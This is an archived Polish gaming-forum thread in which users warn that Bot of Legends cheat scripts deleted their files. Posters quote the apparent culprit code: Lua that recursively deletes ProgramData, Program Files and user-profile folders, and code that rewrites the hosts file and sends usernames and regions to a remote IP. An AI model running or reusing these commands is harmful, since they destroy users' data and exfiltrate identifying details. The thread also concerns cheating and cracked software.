Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Nieaktualne] NIE WŁĄCZAĆ BOL STUDIO / INFEKCJA !

Rekomendowane odpowiedzi

Opublikowano

Siemanko, zakładam wątek, żeby was ostrzec :)
NIE OTWIERAĆ BOL STUDIO !!!
PLIKI ZOSTAŁY ZAINFEKOWANE !
Dziś gdy chciałem pograć z ziomkiem - Pobraliśmy BOL'a z oficjalnej strony i oboje po chwili stwierdziliśmy, że nasze dyski C zostały sformatowane niemal do zera :)

dobrze, że w czas się skapnęliśmy i pogasiliśmy oprogramowanie które kasowalo pliki, mi się udało odyzyskać system po godzinnej walce...kolega jeszcze sie nie odezwał co znaczy że walczy :)
Zostaliście ostrzeżeni :)

• Odpowiedzi 98
  • Dodano
  • Ostatniej odpowiedzi
Pomocnik
Opublikowano

Dzięki za radę, musze sformatować kompa B)

A tak na serio, to jesteś pewny, że to przez bola? Mnie się to jakoś nie widzi.

Opublikowano

że nasze dyski C zostały sformatowane niemal do zera  :)

Hahahhaha, nieźle sie uśmiałem :D A jeszcze lepsze są komentarze innych którzy w to wierzą

sygnae.jpg

Opublikowano

tylko że to prawda :) też tak miałem. Wszystko zjechało. Cały pulpit ale przywróciłem ustawienia fabryczne i juz jest gitara :P

Edit: działa wam strona bola? bo pokasowało mi skrypty...

Pomogłem ? Like ! :)

Opublikowano

Używałem w danej chwili Vpred, Freakin good evade, i jakiegoś skryptu na jinx :)
Wszystko było świeżo pobrane ze strony bola - Usunęło mi ponad 50 giga danych :) Nie to nie jest fake :))
Cały czas odzyskuje system ale wszystko wskazuje na to, że wywaliło za dużo plików i czeka mnie reainstall totalny :)

Opublikowano

Jeżeli faktycznie tak jest, to napewno to nie jest wina skryptu (lua jest programowalne tylko wewnatrz aplikacji - prościej mówiąc to wydawca bola musiał by dodać funkcje usuwania  plików?). Jeżeli zrobili to umyślnie to niezłe strzelenie w stope ale całkiem możliwe że mają hacka bo stronka padłą

sygnae.jpg

Opublikowano

http://www.nulled.io/topic/2725-official-bol-deleting-files/
Wina vprediction

Usuwa wszystkie pliki z :

ProgramData

ProgramFiles

ProgramFiles(x86)

Profil użytkownika

Na początku miało to na celu zaszkodzenie użytkownikom którzy korzystają z cracked BoL'a, jednakże zamiast == Ralph dał ~=

if GetUser() ~= 'Nulled.IO' then
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramData"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles(x86)"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\..\\"')
end

Dlatego też zaszkodził i tym, którzy korzystają z BoL'a legit i tym, którzy korzystają z cracka.

Grottolacje.

eSwH2k3.png

Opublikowano

no bo to było tak że grałem działał Bol potem nagle przestał i jeszcze raz odpaliłem gre i bum LoLa wyłączyło pulpit zjadło. Niezły włam. I to nie pierwszy raz już udało się hackerom przejść przez zabezpieczenia BoLa ...

Pomogłem ? Like ! :)

Opublikowano

Jeżeli faktycznie tak jest, to napewno to nie jest wina skryptu (lua jest programowalne tylko wewnatrz aplikacji - prościej mówiąc to wydawca bola musiał by dodać funkcje usuwania  plików?). Jeżeli zrobili to umyślnie to niezłe strzelenie w stope ale całkiem możliwe że mają hacka bo stronka padłą

http://scr.hu/0ntm/e4p1g Polecam sprawdzic Ci najnowsze vpred ;)

Opublikowano

http://scr.hu/0ntm/e4p1g Polecam sprawdzic Ci najnowsze vpred ;)

Hahaha, czyli wydawca bola nie zabezpieczył sie przed śmieciowym pisaniem kodu xD Całkiem możliwe że konto github dostało hacka bądź znalazł sie śmieszek i wystawił tego commita xB. Imho, gratulacje dla BoL coderów

O jeszcze coś ciekawego znalazłem w tym kodzie :

--Credits to Sida for the following code:

local file3 = io.open(os.getenv("windir") .. "\\System32\\Drivers\\etc\\hosts", "a")

if (file3 ~= nil) then

file3:write("\n")

file3:write("109.163.233.162 botoflegends.com\n")

file3:write("109.163.233.162 forum.botoflegends.com\n")

file3:write("109.163.233.162 www.botoflegends.com\n")

file3:write("109.163.233.162 studio.botoflegends.com\n")

file3:flush()

file3:close()

end

GetWebResult('109.163.233.162', '/' .. Base64Encode(myHero.name) .. '|' .. Base64Encode(GetUser()) .. '|' .. GetRegion(), "", 5)

Oznacza to miedzy innymi ze spisali na jakim serwerze gracie, jaki macie nick i nazwe użytkownika :D Możecie sie pewnie spodziewać banów w niedalekiej przyszłości

sygnae.jpg

Opublikowano

Mi przywracanie nic nie dało - Dopiero diagnozowanie i naprawianie plików przy starcie... Odzyskać co prawda nic się nie udało ale chociaz system sie podniósł - Mój kolega wgl nie może go zbootować :D

Opublikowano

U mnie to samo. Sciagnelismy z kuzynem skrypt scrackowany SAC Reborn. Teraz obydwoje pozegranlismy sie z okolo 200 GB Plikow. Przywracanie dalo tylko 20 GB okolo.

NIE WCHODZIC I NIE SCIAGAC NIC Z : 

http://s-develop. net /

Pruchuu_euw_266_1_text.png

Opublikowano

U mnie to samo. Sciagnelismy z kuzynem skrypt scrackowany SAC Reborn. Teraz obydwoje pozegranlismy sie z okolo 200 GB Plikow. Przywracanie dalo tylko 20 GB okolo.

NIE WCHODZIC I NIE SCIAGAC NIC Z : 

http://s-develop-

Na pocieszenie dodam, że "Legalni" użytkownicy też dostali po d***e :D

Opublikowano

Na pocieszenie dodam, że "Legalni" użytkownicy też dostali po d***e :D

Legalni jak ja do hooya mialem kupionego vipa, tylko sac cracked jprd jeblo wszystko zostalo mi tylko ie

Jestem über alles, kurwa jak Trzecia Rzesza

Opublikowano

Dzięki za radę, musze sformatować kompa B)

A tak na serio, to jesteś pewny, że to przez bola? Mnie się to jakoś nie widzi.

Tak bo mi też sformatowało ale nie dysk tylko cały profil konta wraz z dokumentami  xD  xD  xD przynajmniej mi system odchudziło  B)

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...